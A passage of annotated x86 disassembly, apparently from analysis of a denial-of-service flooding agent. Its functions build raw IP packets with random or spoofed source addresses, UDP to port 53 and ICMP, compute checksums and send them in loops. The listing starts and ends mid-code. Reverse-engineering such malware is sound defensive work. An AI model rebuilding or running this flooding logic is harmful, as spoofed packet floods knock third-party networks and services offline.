0804934d: call 0x08055e38 <__random> ||||| 08049352: mov $0xff,%ebx ||||| 08049357: cltd ||||| 08049358: idiv %ebx ||||| 0804935a: mov -0x660(%ebp),%ebx ||||| 08049360: mov %dl,0x1(%ebx) ||||| 08049363: cmpl $0x0,0x1c(%ebp) ||||| 08049367: jne 0x08049380 *||||| 08049369: cmpl $0x0,0x20(%ebp) |||||| 0804936d: jne 0x08049380 *|||||| 0804936f: call 0x08055e38 <__random> ||||||| 08049374: mov $0x7530,%ebx ||||||| 08049379: cltd ||||||| 0804937a: idiv %ebx ||||||| 0804937c: mov %edx,%eax ||||||| 0804937e: jmp 0x0804938a *||||||| 08049380: mov 0x1c(%ebp),%eax |**||||| 08049383: shl $0x8,%eax | ||||| 08049386: add 0x20(%ebp),%ax | ||||| 0804938a: xchg %al,%ah * ||||| 0804938c: mov -0x65c(%ebp),%ebx ||||| 08049392: mov %ax,(%ebx) ||||| 08049395: mov -0x65c(%ebp),%ebx ||||| 0804939b: movw $0x3500,0x2(%ebx) ||||| 080493a1: mov -0x24(%ebp,%edi,4),%ax ||||| 080493a6: add $0x8,%ax ||||| 080493aa: xchg %al,%ah ||||| 080493ac: mov %ax,0x4(%ebx) ||||| 080493b0: movw $0x0,0x6(%ebx) ||||| 080493b6: cmpl $0x0,0x24(%ebp) ||||| 080493ba: jne 0x080493ec *||||| 080493bc: mov -0x644(%ebp),%bl |||||| 080493c2: mov %bl,-0x62c(%ebp) |||||| 080493c8: mov -0x648(%ebp),%bl |||||| 080493ce: mov %bl,-0x62b(%ebp) |||||| 080493d4: mov -0x64c(%ebp),%bl |||||| 080493da: mov %bl,-0x62a(%ebp) |||||| 080493e0: mov -0x650(%ebp),%bl |||||| 080493e6: mov %bl,-0x629(%ebp) |||||| 080493ec: mov -0x66c(%ebp),%ebx *||||| 080493f2: mov (%ebx),%eax ||||| 080493f4: mov %eax,0x10(%esi) ||||| 080493f7: movb $0x45,(%esi) ||||| 080493fa: call 0x08055e38 <__random> ||||| 080493ff: mov $0x82,%ebx ||||| 08049404: cltd ||||| 08049405: idiv %ebx ||||| 08049407: add $0x78,%dl ||||| 0804940a: mov %dl,0x8(%esi) ||||| 0804940d: call 0x08055e38 <__random> ||||| 08049412: mov $0xff,%ebx ||||| 08049417: cltd ||||| 08049418: idiv %ebx ||||| 0804941a: mov %dx,0x4(%esi) ||||| 0804941e: movb $0x11,0x9(%esi) ||||| 08049422: movw $0x0,0x6(%esi) ||||| 08049428: mov -0x24(%ebp,%edi,4),%ax ||||| 0804942d: add $0x1c,%ax ||||| 08049431: xchg %al,%ah ||||| 08049433: mov %ax,0x2(%esi) ||||| 08049437: movw $0x0,0xa(%esi) ||||| 0804943d: mov $0x14,%edx ||||| 08049442: lea -0x638(%ebp),%ebx ||||| 08049448: mov %ebx,-0x674(%ebp) ||||| 0804944e: xor %ecx,%ecx ||||| 08049450: movw $0x0,-0x63e(%ebp) ||||| 08049459: lea 0x0(%esi),%esi ||||| 0804945c: mov -0x674(%ebp),%ebx *||||| 08049462: movzwl (%ebx),%eax |||||| 08049465: add %eax,%ecx |||||| 08049467: add $0x2,%ebx |||||| 0804946a: mov %ebx,-0x674(%ebp) |||||| 08049470: add $-0x2,%edx |||||| 08049473: cmp $0x1,%edx |||||| 08049476: jg 0x0804945c *||||| 08049478: jne 0x0804948b *||||| 0804947a: mov (%ebx),%al |||||| 0804947c: mov %al,-0x63e(%ebp) |||||| 08049482: movzwl -0x63e(%ebp),%eax |||||| 08049489: add %eax,%ecx |||||| 0804948b: mov %ecx,%edx *||||| 0804948d: sar $0x10,%edx ||||| 08049490: movzwl %cx,%eax ||||| 08049493: lea (%eax,%edx,1),%ecx ||||| 08049496: mov %ecx,%eax ||||| 08049498: sar $0x10,%eax ||||| 0804949b: add %eax,%ecx ||||| 0804949d: mov %ecx,%eax ||||| 0804949f: not %ax ||||| 080494a2: mov %ax,-0x63e(%ebp) ||||| 080494a9: mov %ax,0xa(%esi) ||||| 080494ad: push $0x10 ||||| 080494af: lea -0x228(%ebp),%eax ||||| 080494b5: push %eax ||||| 080494b6: push $0x0 ||||| 080494b8: mov -0x24(%ebp,%edi,4),%eax ||||| 080494bc: add $0x1c,%eax ||||| 080494bf: push %eax ||||| 080494c0: lea -0x638(%ebp),%eax ||||| 080494c6: push %eax ||||| 080494c7: mov -0x658(%ebp),%ebx ||||| 080494cd: push %ebx ||||| 080494ce: call 0x08056c3c ||||| 080494d3: add $0x18,%esp ||||| 080494d6: cmpl $0x0,0x18(%ebp) ||||| 080494da: jne 0x080494e8 *||||| 080494dc: push $0x12c |||||| 080494e1: call 0x080555b0 |||||| 080494e6: jmp 0x08049507 *|||||| 080494e8: mov 0x18(%ebp),%ebx |*||||| 080494eb: cmp %ebx,-0x664(%ebp) | ||||| 080494f1: jne 0x08049514 |*||||| 080494f3: push $0x12c ||||||| 080494f8: call 0x080555b0 ||||||| 080494fd: movl $0x0,-0x664(%ebp) ||||||| 08049507: decl -0x668(%ebp) *|||||| 0804950d: add $0x4,%esp |||||| 08049510: jmp 0x0804951a *|||||| 08049512: lea (%esi),%esi ||||||| 08049514: incl -0x664(%ebp) |*||||| 0804951a: addl $0x4,-0x66c(%ebp) * ||||| 08049521: mov -0x66c(%ebp),%ebx ||||| 08049527: cmpl $0x0,(%ebx) ||||| 0804952a: jne 0x08049308 *|||| 08049530: addl $0x32,-0x670(%ebp) *||| 08049537: inc %edi ||| 08049538: cmp $0x8,%edi ||| 0804953b: jle 0x080492c4 *|| 08049541: jmp 0x08049250 *| 08049546: lea (%esi),%esi | # Possible reference to data in bss 08049548: movl $0x0,0x807e774 * 08049552: xor %eax,%eax 08049554: lea -0x680(%ebp),%esp 0804955a: pop %ebx 0804955b: pop %esi 0804955c: pop %edi 0804955d: mov %ebp,%esp 0804955f: pop %ebp 08049560: ret 08049561: lea 0x0(%esi),%esi # 08049564 : 08049564: push %ebp 08049565: mov %esp,%ebp 08049567: sub $0x68c,%esp 0804956d: push %edi 0804956e: push %esi 0804956f: push %ebx 08049570: mov 0x8(%ebp),%bl 08049573: mov %bl,-0x654(%ebp) 08049579: mov 0xc(%ebp),%bl 0804957c: mov %bl,-0x658(%ebp) 08049582: mov 0x10(%ebp),%bl 08049585: mov %bl,-0x65c(%ebp) 0804958b: mov 0x14(%ebp),%bl 0804958e: mov %bl,-0x660(%ebp) 08049594: mov 0x18(%ebp),%bl 08049597: mov %bl,-0x664(%ebp) 0804959d: mov 0x1c(%ebp),%bl 080495a0: mov %bl,-0x668(%ebp) 080495a6: mov 0x20(%ebp),%bl 080495a9: mov %bl,-0x66c(%ebp) 080495af: mov 0x24(%ebp),%bl 080495b2: mov %bl,-0x670(%ebp) 080495b8: lea -0x24(%ebp),%edi # Possible reference to rodata '' 080495bb: mov $0x8067698,%esi 080495c0: cld 080495c1: mov $0x9,%ecx 080495c6: repz movsl %ds:(%esi),%es:(%edi) 080495c8: lea -0x218(%ebp),%edi # Possible reference to rodata 'Gn' 080495ce: mov $0x80676bc,%esi 080495d3: cld 080495d4: mov $0x7d,%ecx 080495d9: repz movsl %ds:(%esi),%es:(%edi) 080495db: lea -0x628(%ebp),%edi 080495e1: lea -0x614(%ebp),%ebx 080495e7: mov %ebx,-0x678(%ebp) 080495ed: lea -0x60c(%ebp),%ebx 080495f3: mov %ebx,-0x67c(%ebp) 080495f9: movw $0x2,-0x228(%ebp) 08049602: movw $0x0,-0x226(%ebp) 0804960b: cmpl $0x0,0x34(%ebp) 0804960f: jne 0x08049645 * 08049611: movzbl -0x660(%ebp),%eax | 08049618: push %eax | 08049619: movzbl -0x65c(%ebp),%eax | 08049620: push %eax | 08049621: movzbl -0x658(%ebp),%eax | 08049628: push %eax | 08049629: movzbl -0x654(%ebp),%eax | 08049630: push %eax | # Possible reference to rodata '%d.%d.%d.%d' 08049631: push $0x806768a | 08049636: lea -0x648(%ebp),%eax | 0804963c: push %eax | 0804963d: call 0x0804f808 <_IO_sprintf> | 08049642: add $0x18,%esp | 08049645: cmpl $0x0,0x28(%ebp) * 08049649: je 0x0804964e * 0804964b: decl 0x28(%ebp) | 0804964e: push $0xff * 08049653: push $0x3 08049655: push $0x2 08049657: call 0x08056cf4 0804965c: mov %eax,-0x674(%ebp) 08049662: add $0xc,%esp 08049665: test %eax,%eax 08049667: jle 0x080499d8 * 0804966d: movl $0x0,-0x680(%ebp) | 08049677: movl $0x0,-0x684(%ebp) | 08049681: push $0x400 | 08049686: push $0x0 | 08049688: push %edi | 08049689: call 0x08057764 | 0804968e: add $0xc,%esp | 08049691: lea 0x0(%esi),%esi | 08049694: xor %esi,%esi **| 08049696: cmpl $0x0,0x34(%ebp) ||| 0804969a: je 0x080496fc *||| 0804969c: cmpl $0x0,-0x684(%ebp) |||| 080496a3: jg 0x080496fc *|||| 080496a5: mov 0x38(%ebp),%ebx ||||| 080496a8: push %ebx ||||| 080496a9: call 0x0804bf80 ||||| 080496ae: mov %eax,%edx ||||| 080496b0: add $0x4,%esp ||||| 080496b3: test %edx,%edx ||||| 080496b5: jne 0x080496cc * ||||| 080496b7: push $0x258 | ||||| 080496bc: call 0x080556cc | ||||| 080496c1: mov $0x1,%esi | ||||| 080496c6: add $0x4,%esp | ||||| 080496c9: jmp 0x080496fc |*||||| 080496cb: nop ||||||| 080496cc: push $0x4 *|||||| 080496ce: lea -0x64c(%ebp),%eax |||||| 080496d4: push %eax |||||| 080496d5: mov 0x10(%edx),%eax |||||| 080496d8: mov (%eax),%eax |||||| 080496da: push %eax |||||| 080496db: call 0x08056480 |||||| 080496e0: mov -0x64c(%ebp),%eax |||||| 080496e6: mov %eax,0x10(%edi) |||||| 080496e9: mov %eax,-0x224(%ebp) |||||| 080496ef: movl $0x9c40,-0x684(%ebp) |||||| 080496f9: add $0xc,%esp |||||| 080496fc: test %esi,%esi ***||| 080496fe: jne 0x08049694 *|| 08049700: xor %esi,%esi || 08049702: mov %ebp,-0x688(%ebp) || 08049708: cmpl $0x0,0x34(%ebp) *|| 0804970c: jne 0x08049723 *||| 0804970e: lea -0x648(%ebp),%eax |||| 08049714: push %eax |||| 08049715: call 0x0804ce8c |||| 0804971a: mov %eax,-0x224(%ebp) |||| 08049720: add $0x4,%esp |||| 08049723: mov -0x688(%ebp),%edx *||| 08049729: add $-0x218,%edx ||| 0804972f: mov -0x24(%ebp,%esi,4),%eax ||| 08049733: push %eax ||| 08049734: push %edx ||| 08049735: mov -0x67c(%ebp),%ebx ||| 0804973b: push %ebx ||| 0804973c: call 0x0805652c ||| 08049741: add $0xc,%esp ||| 08049744: call 0x08055e38 <__random> ||| 08049749: mov $0xff,%ebx ||| 0804974e: cltd ||| 0804974f: idiv %ebx ||| 08049751: mov -0x67c(%ebp),%ebx ||| 08049757: mov %dl,(%ebx) ||| 08049759: call 0x08055e38 <__random> ||| 0804975e: mov $0xff,%ebx ||| 08049763: cltd ||| 08049764: idiv %ebx ||| 08049766: mov -0x67c(%ebp),%ebx ||| 0804976c: mov %dl,0x1(%ebx) ||| 0804976f: cmpl $0x0,0x2c(%ebp) ||| 08049773: jne 0x0804978c *||| 08049775: cmpl $0x0,0x30(%ebp) |||| 08049779: jne 0x0804978c *|||| 0804977b: call 0x08055e38 <__random> ||||| 08049780: mov $0x7530,%ebx ||||| 08049785: cltd ||||| 08049786: idiv %ebx ||||| 08049788: mov %edx,%eax ||||| 0804978a: jmp 0x08049796 *||||| 0804978c: mov 0x2c(%ebp),%eax |**||| 0804978f: shl $0x8,%eax | ||| 08049792: add 0x30(%ebp),%ax | ||| 08049796: xchg %al,%ah * ||| 08049798: mov -0x678(%ebp),%ebx ||| 0804979e: mov %ax,(%ebx) ||| 080497a1: mov -0x678(%ebp),%ebx ||| 080497a7: movw $0x3500,0x2(%ebx) ||| 080497ad: mov -0x24(%ebp,%esi,4),%ax ||| 080497b2: add $0x8,%ax ||| 080497b6: xchg %al,%ah ||| 080497b8: mov %ax,0x4(%ebx) ||| 080497bc: movw $0x0,0x6(%ebx) ||| 080497c2: cmpb $0x0,-0x664(%ebp) ||| 080497c9: jne 0x0804983c *||| 080497cb: cmpb $0x0,-0x668(%ebp) |||| 080497d2: jne 0x0804983c *|||| 080497d4: cmpb $0x0,-0x66c(%ebp) ||||| 080497db: jne 0x0804983c *||||| 080497dd: cmpb $0x0,-0x670(%ebp) |||||| 080497e4: jne 0x0804983c *|||||| 080497e6: call 0x08055e38 <__random> ||||||| 080497eb: mov %al,%dl ||||||| 080497ed: cmp $0xff,%dl ||||||| 080497f0: setae %al ||||||| 080497f3: add %al,%dl ||||||| 080497f5: mov %dl,-0x61c(%ebp) ||||||| 080497fb: call 0x08055e38 <__random> ||||||| 08049800: mov %al,%dl ||||||| 08049802: cmp $0xff,%dl ||||||| 08049805: setae %al ||||||| 08049808: add %al,%dl ||||||| 0804980a: mov %dl,-0x61b(%ebp) ||||||| 08049810: call 0x08055e38 <__random> ||||||| 08049815: mov %al,%dl ||||||| 08049817: cmp $0xff,%dl ||||||| 0804981a: setae %al ||||||| 0804981d: add %al,%dl ||||||| 0804981f: mov %dl,-0x61a(%ebp) ||||||| 08049825: call 0x08055e38 <__random> ||||||| 0804982a: mov %al,%dl ||||||| 0804982c: cmp $0xff,%dl ||||||| 0804982f: setae %al ||||||| 08049832: add %al,%dl ||||||| 08049834: mov %dl,-0x619(%ebp) ||||||| 0804983a: jmp 0x0804986c *||||||| 0804983c: mov -0x664(%ebp),%bl |****||| 08049842: mov %bl,-0x61c(%ebp) | ||| 08049848: mov -0x668(%ebp),%bl | ||| 0804984e: mov %bl,-0x61b(%ebp) | ||| 08049854: mov -0x66c(%ebp),%bl | ||| 0804985a: mov %bl,-0x61a(%ebp) | ||| 08049860: mov -0x670(%ebp),%bl | ||| 08049866: mov %bl,-0x619(%ebp) | ||| 0804986c: cmpl $0x0,0x34(%ebp) * ||| 08049870: jne 0x080498a2 *||| 08049872: mov -0x654(%ebp),%bl |||| 08049878: mov %bl,-0x618(%ebp) |||| 0804987e: mov -0x658(%ebp),%bl |||| 08049884: mov %bl,-0x617(%ebp) |||| 0804988a: mov -0x65c(%ebp),%bl |||| 08049890: mov %bl,-0x616(%ebp) |||| 08049896: mov -0x660(%ebp),%bl |||| 0804989c: mov %bl,-0x615(%ebp) |||| 080498a2: movb $0x45,(%edi) *||| 080498a5: call 0x08055e38 <__random> ||| 080498aa: mov $0x82,%ebx ||| 080498af: cltd ||| 080498b0: idiv %ebx ||| 080498b2: add $0x78,%dl ||| 080498b5: mov %dl,0x8(%edi) ||| 080498b8: call 0x08055e38 <__random> ||| 080498bd: mov $0xff,%ebx ||| 080498c2: cltd ||| 080498c3: idiv %ebx ||| 080498c5: mov %dx,0x4(%edi) ||| 080498c9: movb $0x11,0x9(%edi) ||| 080498cd: movw $0x0,0x6(%edi) ||| 080498d3: mov -0x24(%ebp,%esi,4),%ax ||| 080498d8: add $0x1c,%ax ||| 080498dc: xchg %al,%ah ||| 080498de: mov %ax,0x2(%edi) ||| 080498e2: movw $0x0,0xa(%edi) ||| 080498e8: mov $0x14,%edx ||| 080498ed: lea -0x628(%ebp),%ebx ||| 080498f3: mov %ebx,-0x68c(%ebp) ||| 080498f9: xor %ecx,%ecx ||| 080498fb: movw $0x0,-0x64e(%ebp) ||| 08049904: mov -0x68c(%ebp),%ebx *||| 0804990a: movzwl (%ebx),%eax |||| 0804990d: add %eax,%ecx |||| 0804990f: add $0x2,%ebx |||| 08049912: mov %ebx,-0x68c(%ebp) |||| 08049918: add $-0x2,%edx |||| 0804991b: cmp $0x1,%edx |||| 0804991e: jg 0x08049904 *||| 08049920: jne 0x08049933 *||| 08049922: mov (%ebx),%al |||| 08049924: mov %al,-0x64e(%ebp) |||| 0804992a: movzwl -0x64e(%ebp),%eax |||| 08049931: add %eax,%ecx |||| 08049933: mov %ecx,%edx *||| 08049935: sar $0x10,%edx ||| 08049938: movzwl %cx,%eax ||| 0804993b: lea (%eax,%edx,1),%ecx ||| 0804993e: mov %ecx,%eax ||| 08049940: sar $0x10,%eax ||| 08049943: add %eax,%ecx ||| 08049945: mov %ecx,%eax ||| 08049947: not %ax ||| 0804994a: mov %ax,-0x64e(%ebp) ||| 08049951: mov %ax,0xa(%edi) ||| 08049955: push $0x10 ||| 08049957: lea -0x228(%ebp),%eax ||| 0804995d: push %eax ||| 0804995e: push $0x0 ||| 08049960: mov -0x24(%ebp,%esi,4),%eax ||| 08049964: add $0x1c,%eax ||| 08049967: push %eax ||| 08049968: lea -0x628(%ebp),%eax ||| 0804996e: push %eax ||| 0804996f: mov -0x674(%ebp),%ebx ||| 08049975: push %ebx ||| 08049976: call 0x08056c3c ||| 0804997b: add $0x18,%esp ||| 0804997e: cmpl $0x0,0x28(%ebp) ||| 08049982: jne 0x08049990 *||| 08049984: push $0x12c |||| 08049989: call 0x080555b0 |||| 0804998e: jmp 0x080499af *|||| 08049990: mov 0x28(%ebp),%ebx |*||| 08049993: cmp %ebx,-0x680(%ebp) | ||| 08049999: jne 0x080499bc |*||| 0804999b: push $0x12c ||||| 080499a0: call 0x080555b0 ||||| 080499a5: movl $0x0,-0x680(%ebp) ||||| 080499af: decl -0x684(%ebp) *|||| 080499b5: add $0x4,%esp |||| 080499b8: jmp 0x080499c2 *|||| 080499ba: lea (%esi),%esi ||||| 080499bc: incl -0x680(%ebp) |*||| 080499c2: addl $0x32,-0x688(%ebp) * ||| 080499c9: inc %esi ||| 080499ca: cmp $0x8,%esi ||| 080499cd: jle 0x08049708 *|| 080499d3: jmp 0x08049694 *| # Possible reference to data in bss 080499d8: movl $0x0,0x807e774 * 080499e2: xor %eax,%eax 080499e4: lea -0x698(%ebp),%esp 080499ea: pop %ebx 080499eb: pop %esi 080499ec: pop %edi 080499ed: mov %ebp,%esp 080499ef: pop %ebp 080499f0: ret 080499f1: lea 0x0(%esi),%esi # 080499f4 : 080499f4: push %ebp 080499f5: mov %esp,%ebp 080499f7: sub $0xa0,%esp 080499fd: push %edi 080499fe: push %esi 080499ff: push %ebx 08049a00: mov 0x10(%ebp),%cl 08049a03: mov %cl,-0x7c(%ebp) 08049a06: mov 0x14(%ebp),%cl 08049a09: mov %cl,-0x80(%ebp) 08049a0c: mov 0x18(%ebp),%cl 08049a0f: mov %cl,-0x84(%ebp) 08049a15: mov 0x1c(%ebp),%cl 08049a18: mov %cl,-0x88(%ebp) 08049a1e: mov 0x20(%ebp),%cl 08049a21: mov %cl,-0x8c(%ebp) 08049a27: mov 0x24(%ebp),%cl 08049a2a: mov %cl,-0x90(%ebp) 08049a30: mov 0x28(%ebp),%cl 08049a33: mov %cl,-0x94(%ebp) 08049a39: mov 0x2c(%ebp),%bl 08049a3c: movw $0x2,-0x10(%ebp) 08049a42: call 0x08055e38 <__random> 08049a47: mov $0xff,%ecx 08049a4c: cltd 08049a4d: idiv %ecx 08049a4f: mov %edx,%eax 08049a51: xchg %al,%ah 08049a53: mov %ax,-0xe(%ebp) 08049a57: movzbl %bl,%eax 08049a5a: push %eax 08049a5b: movzbl -0x94(%ebp),%eax 08049a62: push %eax 08049a63: movzbl -0x90(%ebp),%eax 08049a6a: push %eax 08049a6b: movzbl -0x8c(%ebp),%eax 08049a72: push %eax # Possible reference to rodata '%d.%d.%d.%d' 08049a73: push $0x806768a 08049a78: lea -0x70(%ebp),%esi 08049a7b: push %esi 08049a7c: call 0x0804f808 <_IO_sprintf> 08049a81: add $0x18,%esp 08049a84: cmpl $0x0,0x30(%ebp) 08049a88: jne 0x08049abe * 08049a8a: movzbl -0x88(%ebp),%eax | 08049a91: push %eax | 08049a92: movzbl -0x84(%ebp),%eax | 08049a99: push %eax | 08049a9a: movzbl -0x80(%ebp),%eax | 08049a9e: push %eax | 08049a9f: movzbl -0x7c(%ebp),%eax | 08049aa3: push %eax | # Possible reference to rodata '%d.%d.%d.%d' 08049aa4: push $0x806768a | 08049aa9: lea -0x50(%ebp),%ebx | 08049aac: push %ebx | 08049aad: call 0x0804f808 <_IO_sprintf> | 08049ab2: push %ebx | 08049ab3: call 0x0804ce8c | 08049ab8: mov %eax,-0xc(%ebp) | 08049abb: add $0x1c,%esp | 08049abe: push $0xff * 08049ac3: push $0x3 08049ac5: push $0x2 08049ac7: call 0x08056cf4 08049acc: mov %eax,-0x98(%ebp) 08049ad2: add $0xc,%esp 08049ad5: test %eax,%eax 08049ad7: jle 0x08049d24 * 08049add: movb $0x45,-0x30(%ebp) | 08049ae1: movw $0x1c28,-0x2e(%ebp) | 08049ae7: movw $0x5504,-0x2c(%ebp) | 08049aed: call 0x08055e38 <__random> | 08049af2: mov $0x82,%ecx | 08049af7: cltd | 08049af8: idiv %ecx | 08049afa: add $0x78,%dl | 08049afd: mov %dl,-0x28(%ebp) | 08049b00: push %esi | 08049b01: call 0x0804ce8c | 08049b06: mov %eax,-0x24(%ebp) | 08049b09: add $0x4,%esp | 08049b0c: cmpl $0x0,0x30(%ebp) | 08049b10: jne 0x08049b21 *| 08049b12: lea -0x50(%ebp),%eax || 08049b15: push %eax || 08049b16: call 0x0804ce8c || 08049b1b: mov %eax,-0x20(%ebp) || 08049b1e: add $0x4,%esp || 08049b21: movw $0xfe1f,-0x2a(%ebp) *| 08049b27: movw $0x0,-0x26(%ebp) | 08049b2d: cmpl $0x0,0x8(%ebp) | 08049b31: je 0x08049bb0 *| 08049b33: movb $0x11,-0x27(%ebp) || 08049b37: call 0x08055e38 <__random> || 08049b3c: mov $0xff,%ecx || 08049b41: cltd || 08049b42: idiv %ecx || 08049b44: mov %edx,%eax || 08049b46: xchg %al,%ah || 08049b48: mov %ax,-0x1c(%ebp) || 08049b4c: mov 0xc(%ebp),%ax || 08049b50: xchg %al,%ah || 08049b52: mov %ax,-0x1a(%ebp) || 08049b56: movw $0x900,-0x18(%ebp) || 08049b5c: mov $0x9,%edx || 08049b61: lea -0x1c(%ebp),%esi || 08049b64: xor %ebx,%ebx || 08049b66: movw $0x0,-0x72(%ebp) || 08049b6c: movzwl (%esi),%eax *|| 08049b6f: add %eax,%ebx ||| 08049b71: add $0x2,%esi ||| 08049b74: add $-0x2,%edx ||| 08049b77: cmp $0x1,%edx ||| 08049b7a: jg 0x08049b6c *|| 08049b7c: jne 0x08049b89 *|| 08049b7e: mov (%esi),%al ||| 08049b80: mov %al,-0x72(%ebp) ||| 08049b83: movzwl -0x72(%ebp),%eax ||| 08049b87: add %eax,%ebx ||| 08049b89: mov %ebx,%edx *|| 08049b8b: sar $0x10,%edx || 08049b8e: movzwl %bx,%eax || 08049b91: lea (%eax,%edx,1),%ebx || 08049b94: mov %ebx,%eax || 08049b96: sar $0x10,%eax || 08049b99: add %eax,%ebx || 08049b9b: mov %ebx,%eax || 08049b9d: not %ax || 08049ba0: mov %ax,-0x72(%ebp) || 08049ba4: mov %ax,-0x16(%ebp) || 08049ba8: movb $0x61,-0x14(%ebp) || 08049bac: jmp 0x08049c10 *|| 08049bae: lea (%esi),%esi ||| 08049bb0: movb $0x1,-0x27(%ebp) |*| 08049bb4: movb $0x8,-0x1c(%ebp) | | 08049bb8: movb $0x0,-0x1b(%ebp) | | 08049bbc: movw $0x0,-0x1a(%ebp) | | 08049bc2: mov $0x9,%edx | | 08049bc7: lea -0x1c(%ebp),%esi | | 08049bca: xor %ebx,%ebx | | 08049bcc: movw $0x0,-0x72(%ebp) | | 08049bd2: lea (%esi),%esi | | 08049bd4: movzwl (%esi),%eax |*| 08049bd7: add %eax,%ebx ||| 08049bd9: add $0x2,%esi ||| 08049bdc: add $-0x2,%edx ||| 08049bdf: cmp $0x1,%edx ||| 08049be2: jg 0x08049bd4 |*| 08049be4: jne 0x08049bf1 |*| 08049be6: mov (%esi),%al ||| 08049be8: mov %al,-0x72(%ebp) ||| 08049beb: movzwl -0x72(%ebp),%eax ||| 08049bef: add %eax,%ebx ||| 08049bf1: mov %ebx,%edx |*| 08049bf3: sar $0x10,%edx | | 08049bf6: movzwl %bx,%eax | | 08049bf9: lea (%eax,%edx,1),%ebx | | 08049bfc: mov %ebx,%eax | | 08049bfe: sar $0x10,%eax | | 08049c01: add %eax,%ebx | | 08049c03: mov %ebx,%eax | | 08049c05: not %ax | | 08049c08: mov %ax,-0x72(%ebp) | | 08049c0c: mov %ax,-0x1a(%ebp) | | 08049c10: movl $0x1d,-0x9c(%ebp) * | 08049c1a: mov $0x14,%edx | 08049c1f: lea -0x30(%ebp),%esi | 08049c22: xor %ebx,%ebx | 08049c24: movw $0x0,-0x72(%ebp) | 08049c2a: lea (%esi),%esi | 08049c2c: movzwl (%esi),%eax *| 08049c2f: add %eax,%ebx || 08049c31: add $0x2,%esi || 08049c34: add $-0x2,%edx || 08049c37: cmp $0x1,%edx || 08049c3a: jg 0x08049c2c *| 08049c3c: jne 0x08049c49 *| 08049c3e: mov (%esi),%al || 08049c40: mov %al,-0x72(%ebp) || 08049c43: movzwl -0x72(%ebp),%eax || 08049c47: add %eax,%ebx || 08049c49: mov %ebx,%edx *| 08049c4b: sar $0x10,%edx | 08049c4e: movzwl %bx,%eax | 08049c51: lea (%eax,%edx,1),%ebx | 08049c54: mov %ebx,%eax | 08049c56: sar $0x10,%eax | 08049c59: add %eax,%ebx | 08049c5b: mov %ebx,%eax | 08049c5d: not %ax | 08049c60: mov %ax,-0x72(%ebp) | 08049c64: mov %ax,-0x26(%ebp) | 08049c68: xor %ebx,%ebx | 08049c6a: lea -0x10(%ebp),%ecx | 08049c6d: mov %ecx,-0xa0(%ebp) | 08049c73: lea -0x30(%ebp),%edi | 08049c76: lea (%esi),%esi | 08049c78: xor %esi,%esi *| 08049c7a: cmpl $0x0,0x30(%ebp) || 08049c7e: je 0x08049cce *|| 08049c80: test %ebx,%ebx ||| 08049c82: jg 0x08049cce *||| 08049c84: mov 0x34(%ebp),%ecx |||| 08049c87: push %ecx |||| 08049c88: call 0x0804bf80 |||| 08049c8d: mov %eax,%edx |||| 08049c8f: add $0x4,%esp |||| 08049c92: test %edx,%edx |||| 08049c94: jne 0x08049cac * |||| 08049c96: push $0x258 | |||| 08049c9b: call 0x080556cc | |||| 08049ca0: mov $0x1,%esi | |||| 08049ca5: add $0x4,%esp | |||| 08049ca8: jmp 0x08049cce |*|||| 08049caa: lea (%esi),%esi |||||| 08049cac: push $0x4 *||||| 08049cae: lea -0x78(%ebp),%eax ||||| 08049cb1: push %eax ||||| 08049cb2: mov 0x10(%edx),%eax ||||| 08049cb5: mov (%eax),%eax ||||| 08049cb7: push %eax ||||| 08049cb8: call 0x08056480 ||||| 08049cbd: mov -0x78(%ebp),%eax ||||| 08049cc0: mov %eax,-0x20(%ebp) ||||| 08049cc3: mov %eax,-0xc(%ebp) ||||| 08049cc6: mov $0x9c40,%ebx ||||| 08049ccb: add $0xc,%esp ||||| 08049cce: test %esi,%esi ***|| 08049cd0: jne 0x08049d1d *|| 08049cd2: push $0x10 ||| 08049cd4: mov -0xa0(%ebp),%ecx ||| 08049cda: push %ecx ||| 08049cdb: push $0x0 ||| 08049cdd: mov -0x9c(%ebp),%ecx ||| 08049ce3: push %ecx ||| 08049ce4: push %edi ||| 08049ce5: mov -0x98(%ebp),%ecx ||| 08049ceb: push %ecx ||| 08049cec: call 0x08056c3c ||| 08049cf1: push $0x10 ||| 08049cf3: mov -0xa0(%ebp),%ecx ||| 08049cf9: push %ecx ||| 08049cfa: push $0x0 ||| 08049cfc: mov -0x9c(%ebp),%ecx ||| 08049d02: push %ecx ||| 08049d03: push %edi ||| 08049d04: mov -0x98(%ebp),%ecx ||| 08049d0a: push %ecx ||| 08049d0b: call 0x08056c3c ||| 08049d10: add $0x30,%esp ||| 08049d13: push $0x14 ||| 08049d15: call 0x080555b0 ||| 08049d1a: add $0x4,%esp ||| 08049d1d: dec %ebx *|| 08049d1e: jmp 0x08049c78 *| 08049d23: nop | # Possible reference to data in bss 08049d24: movl $0x0,0x807e774 * 08049d2e: xor %eax,%eax 08049d30: lea -0xac(%ebp),%esp 08049d36: pop %ebx 08049d37: pop %esi 08049d38: pop %edi 08049d39: mov %ebp,%esp 08049d3b: pop %ebp 08049d3c: ret 08049d3d: lea 0x0(%esi),%esi # 08049d40 : 08049d40: push %ebp 08049d41: mov %esp,%ebp 08049d43: sub $0xcc,%esp 08049d49: push %edi 08049d4a: push %esi 08049d4b: push %ebx 08049d4c: mov 0x8(%ebp),%bl 08049d4f: mov %bl,-0xa4(%ebp) 08049d55: mov 0xc(%ebp),%bl 08049d58: mov %bl,-0xa8(%ebp) 08049d5e: mov 0x10(%ebp),%bl 08049d61: mov %bl,-0xac(%ebp) 08049d67: mov 0x14(%ebp),%bl 08049d6a: mov %bl,-0xc8(%ebp) 08049d70: mov 0x24(%ebp),%bl 08049d73: mov %bl,-0xb0(%ebp) 08049d79: mov 0x28(%ebp),%bl 08049d7c: mov %bl,-0xb4(%ebp) 08049d82: mov 0x2c(%ebp),%bl 08049d85: mov %bl,-0xb8(%ebp) 08049d8b: mov 0x30(%ebp),%bl 08049d8e: mov %bl,-0xbc(%ebp) 08049d94: cmpl $0x0,0x34(%ebp) 08049d98: je 0x08049d9d * 08049d9a: decl 0x34(%ebp) | 08049d9d: push $0x0 * 08049d9f: call 0x08057444 <__libc_time> 08049da4: add $0x4,%esp 08049da7: push %eax 08049da8: call 0x080559a0 <__srandom> 08049dad: add $0x4,%esp 08049db0: movw $0x2,-0x10(%ebp) 08049db6: call 0x08055e38 <__random> 08049dbb: mov $0xff,%ebx 08049dc0: cltd 08049dc1: idiv %ebx 08049dc3: mov %edx,%eax 08049dc5: xchg %al,%ah 08049dc7: mov %ax,-0xe(%ebp) 08049dcb: cmpl $0x0,0x38(%ebp) 08049dcf: jne 0x08049e0b * 08049dd1: movzbl -0xc8(%ebp),%eax | 08049dd8: push %eax | 08049dd9: movzbl 